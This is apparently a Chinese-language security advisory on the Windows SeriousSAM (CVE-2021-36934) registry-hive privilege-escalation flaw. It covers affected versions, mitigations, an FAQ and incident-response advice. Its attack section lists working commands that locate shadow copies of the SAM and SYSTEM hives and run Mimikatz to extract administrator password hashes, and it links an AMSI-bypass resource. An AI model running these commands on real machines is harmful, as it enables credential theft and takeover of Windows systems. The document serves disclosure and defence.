微软注册表配置单元漏洞：#SeriousSAM

漏洞概述

CVE-2021-36934 是Windows 10（及11）系统中一个未修补的本地权限提升漏洞。攻击者通过有限用户代码执行能力，可获取管理员权限，进而实施以下攻击：

• 窃取已登录用户的凭证材料（通过Mimikatz类LSASS攻击）
• 转储并破解缓存的域凭证
• 通过银票攻击实现Windows 10机器上的持久化

影响范围

几乎所有受支持的Windows 10版本均受影响，尤其是从1809版本开始的系统。奇怪的是，更新的Windows 10 20H1 ISO全新安装例外。

攻击利用场景

初始访问通常通过钓鱼攻击实现，攻击者获得员工计算机（笔记本、台式机、虚拟桌面等）的控制权。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

:: 以有限用户身份运行（非管理员组）：
whoami
whoami /groups
net user limiteduser

:: 检查注册表配置单元权限：
icacls C:\Windows\System32\config\SAM | findstr "Users"

:: 设置环境变量指向卷影副本（默认启用）：
set directory=\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config
$directory = "\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config"

:: 使用Mimikatz提取管理员哈希：
mimikatz "lsadump::sam /system:%directory%\system /sam:%directory%\sam" exit | findstr /c:"User : Administrator" /c:"8846"

:: AMSI无法防御此类攻击：
https://amsi.fail/

缓解措施

微软尚未发布补丁，但提供以下临时解决方案： 由于权限设置薄弱，有限用户可以读取以下路径的注册表配置单元文件：

• C:\Windows\System32\config\SAM
• C:\Windows\System32\config\SYSTEM

常见问题解答

移除用户组对注册表配置单元的权限是否能修复问题？
不能，原始权限仍保留在卷影副本快照中。

禁用卷影复制服务是否会删除所有现有快照？
不会，仅删除系统保护目的创建的快照。

事件响应建议

利用Velociraptor等工具进行漏洞扫描和修复，需满足以下能力：

• 支持终端数量扩展
• 支持精细威胁狩猎和操作目标
• 支持本地、云托管和公司网络外设备

资料来源：
@jeffmcjunkin
@gentilkiwi

特别感谢Jeff McJunkin与黑山信息安全社区分享知识。